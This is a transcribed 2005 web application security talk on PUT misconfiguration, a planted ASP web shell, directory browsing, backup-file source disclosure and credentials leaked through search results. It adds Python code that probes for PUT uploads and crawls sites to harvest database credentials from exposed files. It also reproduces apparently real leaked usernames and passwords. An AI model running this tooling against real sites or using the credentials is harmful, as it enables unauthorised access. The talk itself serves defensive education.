[Screenshot: "Web based telnet client by Matt Fisher", an ASP page placed on the server through the PUT misconfiguration. At 8/10/2005 1:29:14 PM, from c:\winnt\system32, it runs
echo "this is telnet" > c:\temp\telnet.txt && type c:\temp\telnet.txt
and returns "this is telnet". A second command at 8/10/2005 1:30:17 PM lists the server's environment variables (ALLUSERSPROFILE=C:\Documents and Settings\All Users, CommonProgramFiles=C:\Program Files\Common Files, COMPUTERNAME, LIB=C:\Program Files\Microsoft Visual Studio .NET 2003\SDK\v1.1\Lib, NUMBER_OF_PROCESSORS=1, Windows NT, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.tcl, PROCESSOR_ARCHITECTURE=x86, PROCESSOR_IDENTIFIER=x86 Family 15 Model 2 Stepping 7, GenuineIntel, PROCESSOR_LEVEL=15, ProgramFiles=C:\Program Files).]

Only requires Windows Script Host on the server
WSH installed by default in everything since NT 4.0
WSH rarely removed / disabled in production environments
ASP usually relies on it (Scripting.FileSystemObject)
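How to confirm the PUT misconfiguration without dropping a shell, as an added Python example (not code from the talk). It asks the server which verbs it advertises, then proves the point the only reliable way: PUT a harmless text file and GET it back. Two constructed handlers stand in for the real hosts, one that accepts anonymous uploads the way the vhost in the screenshot did, and the same server with write verbs removed; the probe file name and body are assumptions.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Added example; not SPI Dynamics code. Probe file name and body are assumptions.
PROBE_PATH = "/put-probe.txt"
PROBE_BODY = b"put probe\n"


def allowed_verbs(host, port, path="/"):
    """OPTIONS probe: the verbs the server advertises for path (may be incomplete or wrong)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("OPTIONS", path)
        resp = conn.getresponse()
        resp.read()
        allow = resp.getheader("Allow") or ""
    finally:
        conn.close()
    return {verb.strip().upper() for verb in allow.split(",") if verb.strip()}


def try_put(host, port, path=PROBE_PATH, body=PROBE_BODY):
    """Upload a harmless text file, then GET it back. Returns (put_status, readable)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("PUT", path, body=body,
                     headers={"Content-Type": "text/plain", "Content-Length": str(len(body))})
        put = conn.getresponse()
        put.read()
        conn.request("GET", path)
        get = conn.getresponse()
        data = get.read()
    finally:
        conn.close()
    return put.status, (get.status == 200 and data == body)


def assess(host, port):
    """An advertised PUT is only a hint; an accepted upload that is served back is the finding."""
    verbs = allowed_verbs(host, port)
    put_status, readable = try_put(host, port)
    return {
        "advertised": sorted(verbs),
        "put_status": put_status,
        "upload_readable": readable,
        "vulnerable": put_status in (200, 201, 204) and readable,
    }


class MisconfiguredDav(BaseHTTPRequestHandler):
    """Constructed stand-in for a vhost that lets anonymous clients PUT files it then serves."""
    protocol_version = "HTTP/1.1"
    store = {}

    def log_message(self, *args):
        pass

    def _reply(self, status, body=b"", extra=()):
        self.send_response(status)
        for name, value in extra:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, extra=[("Allow", "OPTIONS, GET, HEAD, PUT, DELETE, PROPFIND, MKCOL")])

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        self.store[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self._reply(404)
        else:
            self._reply(200, body)


class ReadOnlyServer(MisconfiguredDav):
    """The same server with write verbs removed: PUT is refused and nothing is stored."""
    store = {}

    def do_OPTIONS(self):
        self._reply(200, extra=[("Allow", "OPTIONS, GET, HEAD")])

    def do_PUT(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))  # drain body, keep connection in sync
        self._reply(405, extra=[("Allow", "OPTIONS, GET, HEAD")])


def start_server(handler):
    """Bind a throwaway loopback port; returns the running server (call .shutdown() when done)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    for handler in (MisconfiguredDav, ReadOnlyServer):
        server = start_server(handler)
        print(handler.__name__, assess("127.0.0.1", server.server_port))
        server.shutdown()
        server.server_close()
```

Point assess() at a real host and port to test a live server. Remove the probe file afterwards (DELETE, or ask the administrator), and treat a PUT that returns 201 but whose file cannot be read back as a separate, weaker finding: the upload landed somewhere, just not under the web root you can see.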
Directory Browsing

[Screenshot: an Apache-style "Index of /inc" listing with a Parent Directory link and a column of .inc files (datacon.inc among them), each with a last-modified date from 2002-2003.]

Directory browsing reveals file names - no chance at obscuring

Reveals portions of the site otherwise unknown

A hacker would normally have to use file-guessing scripts and other clues

Datacon.inc is easily guessed
Unmapped / Backup Files

[Screenshot: IIS "Application Configuration" dialog, Mappings tab, "Cache ISAPI application" checked. The Application Mappings table pairs each extension with the executable that handles it and the verbs allowed: \WINDOWS\System32\inetsrv\asp.dll (GET,HEA...), \WINDOWS\System32\inetsrv\http..., \WINDOWS\System32\idq.dll, \WINDOWS\System32\webh..., \PHP\php.exe, \Perl\bin\perl.exe "%s" %s, \Perl\bin\perlis.dll; some entries allow OPTIONS, some All. Buttons: Edit, Remove, OK, Cancel, Apply, Help.]

Only a few "known" file types get rendered: the extensions in this table are handed to a script engine and executed.

Everything else (.inc includes, .bak / .old copies, renamed or saved-as files) is served as a static file and reveals its source code.

True for every web server, not just IIS
Source Code Disclosure

[Screenshot: a browser showing a .inc file served verbatim: PHP database connection code with the host, user and password variables in clear text, a mysql_connect(...) OR die(...) call, a "select the database name to be used, else print error" step, and "SQL Error Occurred" / mysql_error() handling.]
The Proverbial Post-It On the Monitor

[Screenshot: three Google search results (with "Cached - Similar pages" links) whose snippets are PHP include files:]

include ("../connexion_bd_config.inc"); function db_connect() ... global $DBuser; global $DBpass; global $DBName; //Your-MySQL-servers-IP-or-domainname $DBhost = "localhost"; //Your user name $DBuser = "poi"; //Your ...

#Edit these variable names ... $DBhost = "localhost"; $DBuser = "r0kozw8qtxeb"; $DBpass = "J0nL5t29tK9rCYB ... $DBName = "r0kozw8qtxeb"; $table = ...

$DBhost = "localhost"; $DBuser = "getout"; $DBpass = "bryon" ...
<? $DBhost = "localhost"; $DBuser = "getout"; $DBpass = "bryon"; $DBName = "getout"; ?>

Yes, those are real live database connection strings

Yes, they contain real live usernames and passwords

No, Special Agent, I didn't try them out.
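The three slides above (directory browsing, unmapped and backup files, and the search-engine hits) are one recon chain, shown here as an added Python example that is not code from the talk: walk any directory index the server hands out, look beside each rendered page for the copies an editor or deploy leaves behind (.bak, .old, .inc, ...), flag anything served as raw script source, and pull the database credentials out of it the way the Google snippets did. The site it runs against is constructed in memory (directory browsing on under /inc/, .inc mapped to no script engine, a forgotten showpage.asp.bak); every host name, file name and credential in it is made up, and the marker and suffix lists are assumptions to extend for your own platform.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Added example, not code from the talk. The site below is constructed in memory:
# directory browsing is on under /inc/, .inc is mapped to no script engine (so it is
# served as text/plain), and a developer left showpage.asp.bak beside the live page.
# Every host name, file name and credential in it is made up.
CONSTRUCTED_SITE = {
    "/inc/": ("text/html",
              "<html><head><title>Index of /inc</title></head><body>"
              '<a href="/">Parent Directory</a> <a href="common.inc">common.inc</a> '
              '<a href="datacon.inc">datacon.inc</a></body></html>'),
    "/inc/common.inc": ("text/plain", "<?php\nfunction esc($s) { return htmlspecialchars($s); }\n?>"),
    "/inc/datacon.inc": ("text/plain", '<?php\n$DBhost = "localhost";\n$DBuser = "webapp";\n'
                                       '$DBpass = "Tr0ub4dor";\n$DBName = "shop";\n?>'),
    "/showpage.asp": ("text/html", "<html><body>rendered page</body></html>"),
    "/showpage.asp.bak": ("text/plain", '<% Set cn = Server.CreateObject("ADODB.Connection")\n'
                                        'cn.Open "Provider=SQLOLEDB;Server=db1;User ID=sa;Password=Summer2005;" %>'),
}

SOURCE_MARKERS = ("<?php", "<%", "#!/usr/bin/perl", "Server.CreateObject")
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".txt", "~", ".inc")
CRED_PATTERNS = (
    re.compile(r'\$(DB\w*(?:user|pass|host|name)\w*)\s*=\s*["\']([^"\']*)["\']', re.I),  # $DBpass = "..."
    re.compile(r'\b(User ID|Password|Server|Data Source)=([^;"\']+)', re.I),            # ADO connection strings
)


def fetch(path, site=CONSTRUCTED_SITE):
    """Stand-in for an HTTP GET against the constructed site: (status, content_type, body)."""
    if path in site:
        ctype, body = site[path]
        return 200, ctype, body
    return 404, "text/html", "404 File Not Found"


class _Links(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v for k, v in attrs if k == "href" and v)


def listing_entries(dir_path, html):
    """If html is an auto-generated index (Apache or IIS style), return the paths it lists."""
    if "Index of" not in html and "To Parent Directory" not in html:
        return []
    parser = _Links()
    parser.feed(html)
    entries = [urljoin(dir_path, href) for href in parser.hrefs]
    return [e for e in entries if e.startswith(dir_path) and e != dir_path]


def looks_like_source(content_type, body):
    """Script source served verbatim: a plain-text type, or server-side tags in the body."""
    return content_type.startswith("text/plain") or any(m in body for m in SOURCE_MARKERS)


def backup_candidates(path):
    """Names an editor, a developer or a deploy script leaves next to the live page."""
    stem = path.rsplit(".", 1)[0]
    names = [path + s for s in BACKUP_SUFFIXES] + [stem + s for s in BACKUP_SUFFIXES]
    return list(dict.fromkeys(names))  # de-duplicate, keep order


def extract_credentials(body):
    """Credential-looking assignments in leaked source (PHP $DB* variables, ADO strings)."""
    found = {}
    for pattern in CRED_PATTERNS:
        for key, value in pattern.findall(body):
            found[key] = value
    return found


def audit(start_paths, fetch=fetch):
    """Walk directory indexes and backup candidates; report every file served as source
    together with any credentials found in it."""
    findings, queue, seen = {}, list(start_paths), set()
    while queue:
        path = queue.pop(0)
        if path in seen:
            continue
        seen.add(path)
        status, ctype, body = fetch(path)
        if status != 200:
            continue
        if path.endswith("/"):
            queue.extend(listing_entries(path, body))        # directory browsing is on
        elif looks_like_source(ctype, body):
            findings[path] = extract_credentials(body)        # unmapped extension: raw source
        else:
            queue.extend(backup_candidates(path))             # rendered page: look beside it
    return findings


if __name__ == "__main__":
    for path, creds in audit(["/inc/", "/showpage.asp"]).items():
        print(path, creds or "(source disclosed, no credentials matched)")
```

Replace fetch() with a real HTTP GET to run it against a target. The fix on the server side is the one the mappings screenshot implies: keep includes and backups outside the web root, or map the extensions the application uses (.inc in particular) to the script engine (or to a handler that returns 403) so nothing unmapped is left to serve.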
Managing Web App Sec

The Web Application Security Gap

Security Professionals Don't Know The Applications:
"As a Network Security Professional, I don't know how my company's Web applications are supposed to work so I deploy a protective solution... but don't know if it's protecting what it's supposed to."

Application Professionals Don't Know Security:
"As an Application Developer, I can build great features and functions while meeting deadlines, but I don't know how to build security into my Web applications."

Contributing Factors

Developers not taught security
Security not development experts
Low barrier to entry for building web apps
Easy to use languages
Rapid development times
COPY / PASTE code from websites, books etc.
Lack of internal coding standards / guidelines
Approach

Awareness
Education
Coding Practices
Standard Libraries
Assessment Tools and Technology

Design for Security - document input types, valid formats and constraints, and build them into the design spec

Test for Security
Don't just review code - the implementation counts
Combine techniques - static, dynamic, binary
Test in QA, also validate Production
Test Often - things change
Development builds Application
Functional defects are found and fixed
QA performs functional and/or performance testing
App is declared ready for UAT
Customer performs acceptance testing
Customer accepts application and sets deployment expectation
Security tests server patches and configuration
Security applies any missing patches or tweaks configuration
Program goes live
Deployment begins

Security enters only after the customer has accepted the application, and only looks at the host: patch level and server configuration. The application code, where the vulnerabilities described in this talk live, is never tested.
Development builds Application
QA performs functional and/or performance testing
(a highlighted step inserted here is illegible in the source)
Customer performs acceptance testing
Security discovers vulnerabilities (remainder of the caption illegible in the source)
References / Contact

XSS-Proxy by Anton Rager
- http://sourceforge.net/projects/xss-proxy

Whitepapers on www.spidynamics.com:
- Cross-Site-Scripting
- SQL Injection
- Blind SQL Injection
- LDAP Injection
- SOAP Attacks

[Book cover: Web Application Security - A Guide for Developers and Penetration Testers, Matt Fisher]

Open Web Application Security Project:
- www.owasp.org   Next meeting in Columbia MD: AJAX!

Contact: mfisher@spidynamics.com